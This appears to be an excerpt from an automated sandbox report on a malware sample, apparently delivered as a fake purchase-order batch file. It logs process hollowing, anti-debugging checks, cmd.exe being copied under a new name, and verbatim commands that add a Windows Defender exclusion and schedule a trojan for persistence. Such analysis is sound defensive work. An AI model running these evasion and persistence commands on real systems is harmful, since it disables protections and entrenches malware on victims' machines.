Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95842
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95733
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95620
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95514
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95405
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95295
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95165
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95027
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94906
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94527
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94420
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94311
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94202
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94092
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93983
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93872
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wisrysxl.PIF, 0000001A.00000002.1591107014.00000000008DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy90
Source: neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Wisrysxl.PIF API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 4_2_02E5F744
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\x.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process queried: DebugPort
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary, 4_2_02E5894C
Contains functionality to read the PEB
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 12_1_004BF794 mov eax, dword ptr fs:[00000030h] 12_1_004BF794
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 28_1_004BF794 mov eax, dword ptr fs:[00000030h] 28_1_004BF794
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process token adjusted: Debug
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 12_1_004015D7 SetUnhandledExceptionFilter, 12_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 12_1_004015D7 SetUnhandledExceptionFilter, 12_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 28_1_004015D7 SetUnhandledExceptionFilter, 28_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 28_1_004015D7 SetUnhandledExceptionFilter, 28_1_004015D7
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\x.exe Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000 Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2E1008 Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 352008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 290008
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd"" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 4_2_02E45ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 4_2_02E4A7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 4_2_02E45BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 4_2_02E4A810
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 32_2_02EE5ACC
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 32_2_02EE5BD7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: GetLocaleInfoA, 32_2_02EEA810
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4920C GetLocalTime, 4_2_02E4920C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4B78C GetVersionExA, 4_2_02E4B78C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
